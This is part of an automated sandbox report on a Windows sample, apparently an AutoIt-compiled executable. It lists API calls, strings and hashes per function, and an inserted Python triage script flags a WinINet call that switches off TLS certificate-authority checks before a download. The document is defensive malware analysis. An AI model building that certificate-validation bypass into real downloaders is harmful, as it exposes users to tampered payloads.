• Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
• Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
• Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
• Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
APIs
  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\Temp\x.exe,0040F545,C:\Users\user\AppData\Local\Temp\x.exe,004A90E8,C:\Users\user\AppData\Local\Temp\x.exe,?,0040F545), ref: 0041013C
  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
• lstrcmpiW.KERNEL32(?,?), ref: 00453900
• MoveFileW.KERNEL32(?,?), ref: 00453932
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$AttributesFullMoveNamePathlstrcmpi
• String ID:
• API String ID: 978794511-0
• Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
• Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
• Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
• Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
• Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
• Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
• Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
APIs
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                    • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                                                    • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                                                                                                    • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                                                    • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: _memmove$_memcmp
• String ID: '$\$h
• API String ID: 2205784470-1303700344
• Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
• Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
• Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
• Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
APIs
• VariantInit.OLEAUT32(00000000), ref: 0045EA56
• VariantCopy.OLEAUT32(00000000), ref: 0045EA60
• VariantClear.OLEAUT32 ref: 0045EA6D
• VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
• __swprintf.LIBCMT ref: 0045EC33
• VariantInit.OLEAUT32(00000000), ref: 0045ECEE
Strings
• %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Variant$InitTime$ClearCopySystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d
• API String ID: 2441338619-1568723262
• Opcode ID: f183c9f019c246951a22bf959abcf8646146e2a0098e96658a8d7f803f4cbf54
• Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
• Opcode Fuzzy Hash: f183c9f019c246951a22bf959abcf8646146e2a0098e96658a8d7f803f4cbf54
• Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
APIs
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
• Sleep.KERNEL32(0000000A), ref: 0042C67F
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Interlocked$DecrementIncrement$Sleep
• String ID: @COM_EVENTOBJ
• API String ID: 327565842-2228938565
• Opcode ID: c53429027a938d0cb53d738561a5b537c268b9dae225d633b1d56c3c7d20582e
• Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
• Opcode Fuzzy Hash: c53429027a938d0cb53d738561a5b537c268b9dae225d633b1d56c3c7d20582e
• Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
APIs
• VariantClear.OLEAUT32(?), ref: 0047031B
• VariantClear.OLEAUT32(?), ref: 0047044F
• VariantInit.OLEAUT32(?), ref: 004704A3
• DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
• VariantClear.OLEAUT32(?), ref: 00470516
  • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
• VariantCopy.OLEAUT32(?,?), ref: 0047057A
  • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
• VariantClear.OLEAUT32(00000000), ref: 0047060D
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Variant$Clear$Copy$CallDispFuncInit
• String ID: H
• API String ID: 3613100350-2852464175
• Opcode ID: 5eaced02bd808bb80e8832f800070633c5db503b85e11b56c521c17bfe1438c7
• Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
• Opcode Fuzzy Hash: 5eaced02bd808bb80e8832f800070633c5db503b85e11b56c521c17bfe1438c7
• Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
• HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
• String ID:
• API String ID: 1291720006-3916222277
• Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
• Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
• Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
• Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
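The WinINet function above is the one block in this stretch of the report worth reading closely: InternetQueryOptionW and InternetSetOptionW are both called with dwOption 0x1F, which is INTERNET_OPTION_SECURITY_FLAGS in wininet.h, and the value 0x100 shown for the set call is the bit pattern of SECURITY_FLAG_IGNORE_UNKNOWN_CA. That read-modify-write of the security flags before HttpSendRequestW is the pattern a downloader uses to accept a TLS certificate from an untrusted CA, and HttpQueryInfoW with info level 5 (HTTP_QUERY_CONTENT_LENGTH) is how it sizes the body it then reads. The script below is an added triage helper, not part of the Joe Sandbox report or the sample: it parses the report's "APIs" bullet lines into records, reconstructs the call order, and names the SDK constants. The sample input is the block above copied verbatim (constructed for the example), and the constant values are taken from wininet.h. One caveat the code carries as a comment: the third parameter of InternetSetOptionW is a pointer to the DWORD, not the DWORD itself, so the 0x100 the static pass printed is a hint to confirm with a debugger or API trace, never proof on its own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: the "APIs" block of the WinINet function above,
# copied line for line from the report (bullets, '?' placeholders, sub-call line).
SAMPLE_APIS = """\
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
• HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
"""

# Values from the Windows SDK header wininet.h.
INTERNET_OPTION_SECURITY_FLAGS = 0x1F
HTTP_QUERY_CONTENT_LENGTH = 5
SECURITY_IGNORE_FLAGS = {
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}

# One report line: optional sub-call prefix, Api.MODULE(args), ref: ADDR.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # immediates the static pass resolved; None for '?'
    ref: int                    # call-site address
    subcall_of: Optional[int]   # callee address when the line is a sub-call entry


def parse_api_block(text: str) -> List[ApiCall]:
    """Turn a Joe Sandbox 'APIs' listing into structured ApiCall records."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = (m.group("args") or "").strip()
        args = [] if not raw else [None if a.strip() == "?" else int(a, 16)
                                   for a in raw.split(",")]
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def call_chain(calls: List[ApiCall]) -> List[str]:
    """Ordered API names of the function itself (sub-call entries excluded)."""
    return [c.api for c in calls if c.subcall_of is None]


def security_flag_downgrade(calls: List[ApiCall]) -> Optional[dict]:
    """Report an InternetSetOption on INTERNET_OPTION_SECURITY_FLAGS and name the
    ignore-* bits its third argument would carry if read as an immediate.
    Caveat: the real third parameter is a pointer to a DWORD, so the value the
    static pass printed is a hint to confirm dynamically, not proof."""
    query_seen = False
    for c in calls:
        if len(c.args) < 3 or c.args[1] != INTERNET_OPTION_SECURITY_FLAGS:
            continue
        if c.api.startswith("InternetQueryOption"):
            query_seen = True          # read half of a read-modify-write of the flags
        elif c.api.startswith("InternetSetOption"):
            value = c.args[2] or 0
            names = [n for bit, n in sorted(SECURITY_IGNORE_FLAGS.items()) if value & bit]
            return {"set_ref": c.ref, "value_hint": value,
                    "flag_names": names, "read_modify_write": query_seen}
    return None


def decode_http_query(calls: List[ApiCall]) -> List[str]:
    """Name the HttpQueryInfo info level; only CONTENT_LENGTH is mapped here."""
    out = []
    for c in calls:
        if c.api.startswith("HttpQueryInfo") and len(c.args) >= 2:
            level = c.args[1]
            name = ("HTTP_QUERY_CONTENT_LENGTH" if level == HTTP_QUERY_CONTENT_LENGTH
                    else f"info level {level}")
            out.append(f"{c.api} @ {c.ref:08X}: {name}")
    return out


if __name__ == "__main__":
    parsed = parse_api_block(SAMPLE_APIS)
    print(" -> ".join(call_chain(parsed)))
    print(security_flag_downgrade(parsed))
    print("\n".join(decode_http_query(parsed)))
```

Run against the block above it prints the six-call chain, a downgrade record pointing at call site 0044AB74 with SECURITY_FLAG_IGNORE_UNKNOWN_CA as the matching bit and read_modify_write set, and the CONTENT_LENGTH decode for 0044ABBB. Feeding it the other "APIs" blocks on the page returns an empty downgrade result, which is the point: it isolates the one function that touches TLS validation so the analyst can pivot to that call site in the memory dump listed under Memory Dump Source.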
APIs
• GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
• IsMenu.USER32(?), ref: 0045FC5F
• CreatePopupMenu.USER32 ref: 0045FC97
• GetMenuItemCount.USER32(?), ref: 0045FCFD
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                    • String ID: 0$2
                                                                                                                                                    • API String ID: 93392585-3793063076
                                                                                                                                                    • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                                                    • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                                                                                                    • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                                                    • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                                                                                                    APIs
                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00435320
                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                                                                                                    • String ID: crts
                                                                                                                                                    • API String ID: 586820018-3724388283
                                                                                                                                                    • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                                                    • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                                                                                                    • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                                                    • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\Temp\x.exe,0040F545,C:\Users\user\AppData\Local\Temp\x.exe,004A90E8,C:\Users\user\AppData\Local\Temp\x.exe,?,0040F545), ref: 0041013C
                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                                                                                                    • _wcscat.LIBCMT ref: 0044BCAF
                                                                                                                                                    • _wcslen.LIBCMT ref: 0044BCBB
                                                                                                                                                    • _wcslen.LIBCMT ref: 0044BCD1
                                                                                                                                                    • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                                                                    • String ID: \*.*
                                                                                                                                                    • API String ID: 2326526234-1173974218
                                                                                                                                                    • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                                                    • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                                                                                                    • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                                                    • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                                                                                                    • _wcslen.LIBCMT ref: 004335F2
                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                                                                                                    • GetLastError.KERNEL32 ref: 0043362B
                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                                                                                                    • _wcsrchr.LIBCMT ref: 00433666
                                                                                                                                                      • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                                                                    • String ID: \
                                                                                                                                                    • API String ID: 321622961-2967466578
                                                                                                                                                    • Opcode ID: 3116705ccae5b035fb050d3d24a4b0e96dbfb2baa543bedfe79533bbc9dedcaa
                                                                                                                                                    • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                                                                                                    • Opcode Fuzzy Hash: 3116705ccae5b035fb050d3d24a4b0e96dbfb2baa543bedfe79533bbc9dedcaa
                                                                                                                                                    • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wcsnicmp
                                                                                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                    • API String ID: 1038674560-2734436370
                                                                                                                                                    • Opcode ID: bbd0115777c328fe2b5b97631fd4b032eb1a1adf87e6235e777947e3b4874035
                                                                                                                                                    • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                                                                                                    • Opcode Fuzzy Hash: bbd0115777c328fe2b5b97631fd4b032eb1a1adf87e6235e777947e3b4874035
                                                                                                                                                    • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
